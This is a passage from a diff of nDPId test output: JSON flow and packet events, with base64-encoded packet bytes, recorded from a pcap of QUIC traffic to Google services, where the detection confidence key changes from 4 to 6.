iGfWVxPGI0CPYVZsfmSBJekaJCKENQtKqBFs6AVPQwEuwFcacGyY3xE6s1Lu4QTKe\/QxafP6viMrvTQxzW0bcasUyFE1R7C9iQNIeJ9yKNA39s4GHvCsBht5FKpCx9AeuLYalRseEn8YWrDkPowTqNRxe0MscA8q6SQSy6jR0pOiyDsuL3gqILv\/SY8Rac1R05nZiLplGpiGDhE9pweKrCSsLdVSYAwcW3WvtmtNMX4EmbGMMrtnYEWdvuR4n2IdSRyv9gEYX6Q8hzoHG8BLHi+9db7fSutvIgwHCOUrjIPrH1I3iuMdZlcts6TP7n\/rLuIJQ90AfdfuDPtfyv1mHgxz
TtaN2PTxwVb6duplHtdyIHwQW4JxQZkf9eUmK3IFE1g8uPWvlB3korqRC3X0AcAV+sx3QBx\/qT\/7gF6DFP2pyevadhyCvcOrG457OyVD1AcTPiu4iyRPIPs0ZJvBKST0kuFIAK1RoJYGXKAWb6J9ZLx+s6hzq\/1f\/0fVYymn2hbZDLHShxwbQkfEQlrOwalUO2ySwNcLdHaWrgafMwU1Jqwy3c2Wh9mqTVQACa1BySgEpwrkwNkoUZ7lai8AVhdHtwXYpL1gB\/TH91SWvUyF9Dvtha9t5tE0iXlmpfJuZOaqCkHSIu0XSKSxIBe2ySee8BdNbxqds4tKl3kUNeesA0aLrk5BIYrRjA9iqsg5i85TcPN7ilOO\/einXalctu3yF2I12P95cnmn8dVV+5aGLhS7eTX+TflkPHiEhNljw7cP3w4P+5GLFwM5tudCaDLA6afeuHwRmNyu4EHuYIuyQ95\/VnxA50tA8cTxnIXtWDvz\/V\/1jC10E8ZRQOx5RAzeQuGCKL+yBkb5e6xUFflBWfYCece3PTocANgv7MamRt+5dIoEcXIWJrMMSlrfY87Sjfbdyjyitgx\/3GErSHkqQjzECLn35cePuOYXjGdauoaI0FdXFxX0N4pWRgIFSMOMgv7WGHyUa7JL2uW1l6IWs4\/VyxVO7nYI1RKa0HSXbv+H2wrJyMWxXEF+FapMN8qENUanZn0DBN3nS29l14g27PiX1KosPCMvNsAEyL+FHupF8wbuG7hhioKZRauujDguEg9ExQ0m3tL2dBvtN5ROVDD26LyzDaWTk5zwZ2+bt9\/cncF+BxskyVsaDrMG5BAD+R2MBcjstM8WCqDrGmpTzd\/RDmbyfQ94p8EE9NW4bT2joZcpOovGfpfSmOfPG01l3k3sCykGLsIrKUzsxdgNn2SuQjCvYA92JZ4glYI"} -00953{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":145,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":97,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621499083794,"flow_last_seen":1621499083794,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621499083794,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"185.186.183.185","src_port":49217,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"safebrowsing.googleapis.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"78ba053b9aa352e84a4eea899207839a","tls_supported_versions":"TLSv1.3"}} 
-00743{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":146,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":95,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1621498081522,"flow_last_seen":1621498083623,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":5400,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621499083794,"l3_proto":"ip4","src_ip":"159.117.176.124","dst_ip":"198.74.29.79","src_port":61202,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"}} -00743{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":146,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":96,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1621498212950,"flow_last_seen":1621498215051,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":5400,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621499083794,"l3_proto":"ip4","src_ip":"159.117.176.124","dst_ip":"128.248.24.1","src_port":49521,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"}} 
+00953{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":145,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":97,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621499083794,"flow_last_seen":1621499083794,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621499083794,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"185.186.183.185","src_port":49217,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"safebrowsing.googleapis.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"78ba053b9aa352e84a4eea899207839a","tls_supported_versions":"TLSv1.3"}} +00743{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":146,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":95,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1621498081522,"flow_last_seen":1621498083623,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":5400,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621499083794,"l3_proto":"ip4","src_ip":"159.117.176.124","dst_ip":"198.74.29.79","src_port":61202,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"}} 
+00743{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":146,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":96,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1621498212950,"flow_last_seen":1621498215051,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":5400,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621499083794,"l3_proto":"ip4","src_ip":"159.117.176.124","dst_ip":"128.248.24.1","src_port":49521,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"}} 00632{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":146,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":98,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621499130835,"flow_last_seen":1621499130835,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621499130835,"l3_proto":"ip4","src_ip":"52.187.20.175","dst_ip":"198.74.29.79","src_port":61286,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02319{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":146,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":98,"flow_packet_id":1,"flow_last_seen":1621499130835,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621499130835,"pkt":"AAAAAAAAAAQA+mr7CABFAAViautAAH4RX5w0uxSvxkodT+9mAbsFTpEZw\/8AAB0IgC3o3GMiP\/8AAEU0PdKy7uKG3ARNfT09pZj4weIAx8vl1AZI+zMCTSNcyqisuLogUxNuVvaYt3\/glQ+D6lndRNMSuyW6j5yustnSGakysxsalXmdT1UcNTCHKHLeg8MGYbFf1nX95GwKiEKdI50HtYAVtBQjTNOTIu4nPcMX+lDl5V6\/ytmtC7XiQnbKGjmWQm\/5MDqEu40hggsQtcdk2jnQjgDTlviz5K19+Tr1C9ZtBh0pIi4\/9HJR25mhrL6n0N1dPzZ\/Sqk4b9t3u89S9E30HZYdBGpKBZsCH9hWFAhEmi7j9zZtGj\/cxAMeBcWRYInSCSDQRHhlkWsdmuRhy3Q07JJw\/pEuGWxhUDuVEci8KtERueLkLLLpEexZVihN4fEprEovribmXQoru+8BTBV+JKFqpyK44xLUOIK69w2LDvW\/c9dPKklcJAIVdwv\/H0kgY4YqDOIxKOP84t7SjU2P\/ow0Hgn\/JAdJ6i\/lHci\/A9+cu9\/Xk16H553fgdhUwRGo3ALZoNMzPzZ1o3fb5FWDfOha3mWIsBgUxeNt4buHg+jzgWf7W+8y6hmDLWrPKxyW2XOx6tYTJz3Xjs+\/mCn0wh\/mAZ+1hWOefp3U2Y80XBDgcJQRXavyO05wNoq15SpWKscYO5J7keXA83swiPGep5RyjOBdKfiII0v1ao+0rcEj0azRi8HmEhA\/AjmGfVSAAHVwBUamRC5+huXrgR7MEVx67+etgSdyuW\/yAF8xKZdh7YH+6wKsN72y7zdLpHJKk0SbAUI46TifMcEIMeIjlEPcVZXIE5rZ5rAAIrKbutpPELqhKDRo+C3oR4n9djDZXmF+B4O61eZoj26V8iiMi3Ap\/CD+ILTxN1vpLCz34kzpWw+Nvi\/ei8CsOgprWtklqFizkd0rAcDGEQGgQUmScGmGMEFTP7Tg2c0rd2YIJhDkQOLfYLZbFQ53RWO0Pggj\/QDl2rb91M5mdkJT0X64J45SyH9PR\/Q3NGgNCplgG+Zi1JMbY22khGyCv03BTfHcT6hnjWVcK0KimWhXdtO40IIpbzn37UO9Luj5lbbwTxA+F15tWNy3XlcT29pBTkrxIoD1a7jgZwe2L1\/Ov4CPoXZLMCQMQHvebHhxwgktEDCOQHeufOAARA9+ttGIYLmddJgygIHV+Z0m9eIUy9kSZvBlaoiT+1q5FRgi4aM7OXeRlcCnvKKLkhgPWsdD0iPMWVSO46LUV89lhtNMGfdtBxkfsOg+W5oXMWMpj9KmR6kowFzf9zj2QyWQFYmhpTbluKm3xfoGLLarkejEApaHi42nZxpainN+yR4Xj1CvqK7729lw20TkDJxJys8CkR6zRpnmDL275nTf\/h6umI\/BjPRIRIgbx3bSDq20ohdXKRrSZXC\/Arr5YfL+XhMgAUJbz3r4XwrrmclpOMMJn2kr\/gs3To4em\/HdWYqxdT6aST7ERX9KK04xNC6\/hrkuQzcR
ruUkuY3mUT8iKJjTr46ie2j\/A1tng3m3VKM0t\/2rfAm08hZWqsveRgilR3Zm78b9fgxj9VY8tmIh3i6sK\/djJUOnInRG631tWG0Qe1eRXSJgMeHizDi47oScl6deUbLalH1IvbrClHklGE\/ZcbaAKgwr43r+5MEM4cfDxEWqZaPxzsAHgwOhwkmTZ30Jhi+c4as8kD0LDD4tAMnjZY1FLuGbtQbU3BlRBN9KIN1hHKMv01OPEqvqTE8yp4iGqB9BypJrEEtRX\/ZZWohZEKxDzLUAu7MMY9Va00pq66LfRVHtgBgFkrrN5Dlw320q"} -00951{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":146,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":98,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621499130835,"flow_last_seen":1621499130835,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621499130835,"l3_proto":"ip4","src_ip":"52.187.20.175","dst_ip":"198.74.29.79","src_port":61286,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"safebrowsing.googleapis.com","user_agent":"dev Chrome\/92.0.4503.5 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} +00951{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":146,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":98,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621499130835,"flow_last_seen":1621499130835,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621499130835,"l3_proto":"ip4","src_ip":"52.187.20.175","dst_ip":"198.74.29.79","src_port":61286,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"},"quic": 
{"client_requested_server_name":"safebrowsing.googleapis.com","user_agent":"dev Chrome\/92.0.4503.5 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} 02308{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":147,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":98,"flow_packet_id":2,"flow_last_seen":1621499131134,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621499131134,"pkt":"AAAAAAAAAAQA+mr7CABFAAViavhAAH4RX480uxSvxkodT+9mAbsFTiPZy\/8AAB0IgC3o3GMiP\/8AAEU0xNPHNjkzcBN6tG3CMXMgN1VQUQ5zORwwdJvxC+4U4Wo768p0CS6oitGkvJZyjwyc3OomATdmVH8dl4u8+5ZoRqU5nHzh8arBwEn1ailAEl2\/FeLrAKukjlpYd2Uk6yjAdkKgzRJUrt7\/axFA3LL6O7tdgC5hzo0E0\/vl4YnagMJM3wjFjjHYO2MS55fyThkTKtMGKHzAVPiKv2kKUgzu3g8FlFf4vERg7PBca9iFQwa1e6czfFLHU3jmlRamr1hxIWC8ey9XXVda7oP9kCT82UgKpNgsvn9ag0yB6QxqI6o91lGsTfzgwNOJcVvwV3aY2qjfabeDbzPU82GWmC8dcxg60wWM23VAAZlVYaqE14ppMMyorKrKFMn+86H5\/aNgSXh0MxcYpilmN6MgsD5Jpkp6OIphsmHoNdSCO0UVCwGJhSGovYG83XAmetDlCEUuBf6MaZFXBjrfL+9+VHX4irSmtkovc6L5vSe3Nf\/Ub6qgARu+YW6Wwl4tUjGEcM7JKUQxN2Ukg1PimEsh9oAZ12nyYh9FV1JccWxNJ2iNa0HzjjZKFHsI+Wpn2wjQu6fGLrQdYisl3dxVlFj4jvRBju6QBGPqW8L8vdchXv3SI7zqO+NhEBqeCwisAVMGs3\/e0eLRoiqrlCvpzdd6wmWwzublWtkESFBS+GKBzAzbuO4L4Jk3UFfDunCYtqzhO+2c92mAtqsWUkc7CKf7i5TjKJZM8unl261yU\/jXeb6zhnBK28FD6Pf7vze97LmpT5VanmKiGpb8ZFvlX5LvJwFqOst\/Op1D8Xr+i6cOe2zujddvgkGRpWHduSyvlJRv5eRBop0FHOugDZjHwRl1P5GOEDM7AA1rf2k\/IZ6eHOqZsGK6AJyenzNCgwn2VrrkC9JsT5B02qcBGp2ieI1StsetnNDeBxqD01kqrPTmpVvwJxCy2yxgJrEXUggkwFbWIS7thWSjjhXDU0J1GP9L68+5UUKxu0743nekpL+HTPJD4N3h3CVTgzlGthPYulkO8tpw\/xmwb4Z53Jqw0aGKoz+dhDGMih5n97yaHi969BtPXsVrXOzMwgYDcGdHV6VGFDrRp8MvBHKVCcSB29+r+o\/y7gXXTkYGvFUdNPQnjtOPuTA3g6ED4ZH8pHwnFuthO9KrwMMPO0Bmio3US2E5BtPsHcZEVYe8RumZt3y1QcMWOvon\/UMvBjIjvrv0jsdmxjixC9tBFNbGe7r97P3sSHc
FQ62T6BzS\/+NgBh1Yy4NhP5OC50DrYOUUKT2FWmyPF3rEeN7cKlVvDoToDTZvmnHz0lXki3TSjmEpfEl8VTrO2dVRjEyX6UGi07VXGODj7O0oDpUYCDjmG1IY0i\/swPCy3NuNEJt8yL0p3nKFjn1FYCc72eaCLxOWLqdkUlTWvm8YpTERh\/\/2jrhdGM0qtsJ7FcXHR51v4J\/QVf7rdJwPLrxNThdnZTGK4C1SIOXmUd+I7RAsVphCtMqkYz2xSC9bj0qFHuk+dNgchK\/qNK7D\/3TQluL6drX87zcJEWbeEAz++Bs4gMrOfH1c41XMna9bpL8uXPg\/gpvGR2NJd9tPrZADqH\/l\/5rjIhOiUnkWVyo0TCuowGc1U+R+LzRsroJKH\/6INUIkFvJyqDDWDuiqbuF4a8ofyZWpGKXbY6tbrxR5vwaHY6nEBEtgpQDNpXreT8uG1VJNuS0qFW1sMAQeSlsJF2xsZqjv925b07nSHBK8aJ++l8pku10eV9oj5mc55it2ZlpB3G4BEsXbBXW0kaMazv8X"} 02316{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":148,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":98,"flow_packet_id":3,"flow_last_seen":1621499131747,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621499131747,"pkt":"AAAAAAAAAAQA+mr7CABFAAViavlAAH4RX440uxSvxkodT+9mAbsFTucGw\/8AAB0IgC3o3GMiP\/8AAEU0O8kVjzdhFbU85yBt1iwqehVgv2Jezj6mn9SdO\/xAMoQ6Qj2CZu4L+khp0ED4qwgVsRimpW9+019RfzBmCFh99aBBiZCv05rUnXo\/AfLOGNQtnfLnIt22QaI4txCY1wQh4\/Yqe+fANHZK\/ZmF\/8jsdmd71qfw03URemmchuDEmTC2QyCtQDR6IgH1doVCRoOWgfqOlswkaRTmqWfAdyO82HcYIhAl\/HvuxVmWaTRo+N+1Uvg3vOoeFbmkRfA3yUNsNKKXj3CuZnmwqgawAkhvUNunDuSNb6sXcWQSLMYzSYokvzGSrnCUFzWEzLjsIIkXyik5WMtbabj\/rXxW\/BmKnGxQAsyLYjlGWLl8IsRIUrFFSYYnArQnHAypfPl5sP2d4bIyERB5Xk+W0ngzdIfL9its1S\/1UVAsH\/LCTr4l85qg6B3o5lI7DKEPxygD1vV7v2kHUJUOsz6IQEA5cB8per0TSrcw70EjOs2PB2X\/KlkRtnF3cJ9mBrlLk7KkAdUnU+mv18q7Ur\/HRCeSKZ1IDGV+ySb3Pkkbb41pvETv2t9LoyQAD6Lzg0sSPQ7JLV2KhP1jHyct5463eYlSDK4lKsa29bix2j9nRvZdlPAs7HziAX+7Yre3QLRHAPqf\/Fg1bbLM5UQ4fWOBRZxhjJcdvgOJYkAXggHGTSKUtw58FK258BEuvGOXPaZLUbUPnco5cBPBIPnVm18eagNa8I5hoD3V4qJwr9MuaRW9lHG4afIywkdpNhJvwCaU0fJZ7zWnop85QgRGJTV5214WTZL+EUJZ8twDwaNzSY1ggAfatI1G32TefYqPxD0muHegRu5a+vh6GU9Nr4OZ\/spphiT2QHSVclDaYx2okizMN5ZYBs0bQln9i6XBm2Xldh+51uDHmQ4Zzp5v5YqyrRXhV0Ffzvxr
dzKY7KJJQgW29XcUFfrN5qG1mzTku37OdUh4OsIIhl78ZXl7b4B4gtfU2MlbyD0x5w27\/HBKRN75vA6sVD4434hZz0CVYEpHiS\/\/F+U03dYEtR9fBHiid5ECmvh8ygYyirip51ZPSMQ+xf+D7QciO3qwP0jr6a1lkCiOGvIgtxOPSkwBE14jvn4b4AgoxAwzxMoNWG+KiIzQcc5d77j3SVtd+zufZsoTaSVxvbWmtRH0a31c5XS8D\/F0m+6IrOG+sVg+DE76dDddFTb+w9dffyNc0Dy2WGhcNHMlytYl3hpyDxLT5XyRXvjxA0\/VLZiYU4eZ4ElyHnvoUsVc1zIaglmrF+UZkxVlMip6nMHZ9lAEsM5\/RJYf6oyNArAqc\/usJ\/9w+reh+ZP71fVKQMu8hkbAHifaXr7zINN8beOioIt1MpZKpcyaXZRCKvAOiunMN2HFg7gb4p\/O\/EYfkBy\/QNmvkqv63ADfvqVNbE3rlc1Spji+jLBIq3nPFuy\/5gX\/hKpM6V+1cWwiQk9pBOX4ZM5SBBKjwpGA59adqr0mV2fpXKtxohrt1P7YEzdHgk6wi5UR4cnhpR6ATzawptEewUpLpO9E5\/GgMkhT3mM2LdLlAJbflcld+TxymmmNvb3UpmjyGh3\/j4AG85zZBWQGL4jZJFWwd8JkedM8UyyY3+J7Hf7Llgt2XBjEica1HmobGyVnvxPpQPkJ3hFFYALzmeLaq88STNOaZPk6gzd8otilv70M1Uie7Wd78Y3H+OJSDOFEeZSWpO7cC\/0ENxs6hxSkpuU\/vHtior07jJ7OPSapjbYusV4q2O8nnSUJJ+wHjLAkldls5Mo1vwKpLEojKmMh"} 00606{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":150,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","packets-captured":150,"packets-processed":149,"total-skipped-flows":0,"total-l4-payload-len":201150,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":98,"total-detection-updates":0,"total-updates":0,"current-active-flows":2,"total-active-flows":98,"total-idle-flows":96,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":448,"global_ts_msec":1621500710201} 
00635{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":150,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621500710201,"flow_last_seen":1621500710201,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621500710201,"l3_proto":"ip4","src_ip":"52.187.20.175","dst_ip":"102.194.207.179","src_port":53260,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02304{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":150,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":99,"flow_packet_id":1,"flow_last_seen":1621500710201,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621500710201,"pkt":"AAAAAAAAAAQAXWCjCABFAAVidHpAAH4RAzE0uxSvZsLPs9AMAbsFTi9Ky\/8AAB0ItCn86+Se4YgAAEU0MHhrfbtIJTtH3QVY6F3aeUtwMPN+HFDoLuLJNWWF83Oo91F\/IrU\/4VzzpTeT2Fs3WeheARS7a3eJ6+jBx50KgL2Mtap+DJiMUnv5+MiK\/lUO39U0cv8d7GpIK\/I60LKV\/5UKO3hYdAl9H3sKf\/17sYn0RqCxn3h27SFb14UfQMrK5fzHbBIcyCTwAI8EH1FUNiii2EHC6MKWOlasY1W7tTdhYLqIJe3Pnw\/eMMH4EH67C816p5GMiQfDThgfQ2wgQHnziUTQvAMRReqOG70usUWRBc0H+BQ8YvPfZECfgPywP5jcJ6yFiW20NNxDHB6aoJ4Cj+YV3HYe3hWH6RtYkzgshfY2d5Z5SXiixf9F396ika8t5YhgzUJqm3qaduYkkuoKsKEzuoXUVwFjy4mdMVXENEyNoKQ+m7hVG2MtxWAe5F0iilBt4B+B47gPKblladD3cYJ89FSWeT4JmrpSKq+sitEawWg8mHrgGTQq7NYbu7N+XGgNwfYKSGmo+wJ4PZoiqprX5abZOW0AcEO4GmP23kcsiaw6jBKGRiI62wQkX3CdcrDC94UAE4ETeCTM7KGTkc2NjqYwxvCRWtYhRE2jKZjoxjsBPN71ErHefn1F+hbfKNlDzSGX\/XS29PsKXDs3Zy7d5AvyJhbeMO5c9ZW9Z367PIIkmQCfsx7uUon\/NyNKlzzrFPmj4\/Q5MNYmYJUzIjfkdbkREP\/oi3qdVUZRk6Qq3mEyntdw2m0x+Fl9NnJmI7wPyTSTYM1zGxtoprNKLZoKHPJUdriJdNO1mtZLgz\/iMksWRPpo1KJv17xWq6zVr1T5Rb\/56VZDZZTzvvnDR
3LfObrvTjxHZjpDe470INkM91Ng4x1MGEIzMvtmxatbi7QsiBiDO\/OqdD1JZRhadEr1SeF+j+x3pCgDJPrTxUQNeLKGpDOINsHcCNzi9E6t6xSea+mxi6UCuZeVqiu7Mq6oTDEdYhM0f2zJdDmUwxt9ntbOaqb\/70GFQw3Pu6A6FPriLWgxfjbt820gGfdllAq3bd17xNlN89\/sslY71CRXr\/AXS9zW9TVm9cE3ieGVRvpPlBXLxR3CcDRad5beYHB2p+59RVP4JEz3gq5xGAJk56U10gDcUMuTu9lOP0LVK6rTCu109YNLsvJwHDQHJg6cMb9ghMycYjRH9R8GiFVxeXk8FZUVTPEwK19hu5R3J4CDXQi+bSlYR8ZWUeNFXdURMnp1LQodsU7HXmk0DNjXTkB48gPiecCbmUF+uqaDsBFruhCgfz1ajvkEGLeVbKosgz80uhsQmk3MpvR16f+ZOAa9cii2ACYegZ1+a4KEx2NvHlXUrXa2GOsjIAygu7UkwCjyJDh\/KLNwjSadZAQTyM7O4lGORdsjV5FzQj3iyRFzjEjdAaMYFQh7u74sj71sIjcdgnajLAngwvieEOhjfkDL0tvg0+xr2ScehwvmJTYQZ0A4LvQTGmQ0QSop8E3Bdjoib9O4UduuWyY49M20Z07qfK9fbUe3P7MyS0IssG5j+o2HGVtB2rGDGegUxPzqBriraNuRetc+27PYobO7JO3W\/n8cUzNrheWIWi9IB4U+pmyDcJIP58jjktd5G89dt6sAMJR3A5kbmIbJ9iNmSo5NdNog3tnD5t5HDujKlpjs5YYJJjfEpJdk07sWx3cs35o4J40ZUcj6dz2f5kyw3ZDKB\/hzEHArYpTkaJY4Gfn8PS30KdL4TNAJjWtoOfQevIKVcxh5IQLx0UwAHLDP4qnlqslqSloufJGz2Uh8"} -00956{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":150,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621500710201,"flow_last_seen":1621500710201,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621500710201,"l3_proto":"ip4","src_ip":"52.187.20.175","dst_ip":"102.194.207.179","src_port":53260,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"clientservices.googleapis.com","user_agent":"dev Chrome\/92.0.4503.5 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} 
+00956{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":150,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621500710201,"flow_last_seen":1621500710201,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621500710201,"l3_proto":"ip4","src_ip":"52.187.20.175","dst_ip":"102.194.207.179","src_port":53260,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"clientservices.googleapis.com","user_agent":"dev Chrome\/92.0.4503.5 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} 